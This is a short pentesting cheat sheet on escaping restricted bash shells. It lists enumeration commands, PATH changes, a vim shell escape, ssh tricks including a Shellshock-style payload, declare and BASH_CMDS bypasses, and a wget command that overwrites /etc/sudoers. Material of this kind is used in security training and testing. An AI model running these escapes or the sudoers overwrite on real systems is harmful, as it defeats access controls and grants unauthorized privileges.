Bash Jails

Bash Jails

Enumeration

First enumerate the best you can:

echo $SHELL
echo $PATH
env
export
pwd

Modify PATH

Check if you can modify the PATH env variable

echo $PATH 
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin 
echo /home/*

Using vim

:set shell=/bin/sh
:shell

Create script

Check if you can create an executable file with /bin/bash as content

red /bin/bash
> w wx/path #Write /bin/bash in a writable and executable path

Get bash from SSH

If you are accessing via ssh you can use this trick to execute a bash shell:

ssh -t user@<IP> bash # Get directly an interactive shell
ssh user@<IP> -t "bash --noprofile -i"
ssh user@<IP> -t "() { :; }; sh -i "

Declare

declare -n PATH; export PATH=/bin;bash -i
 
BASH_CMDS[shell]=/bin/bash;shell -i

Wget

You can overwrite for example sudoers file

wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
PreviousLinux Privilege EscalationNextssh agent

Last updated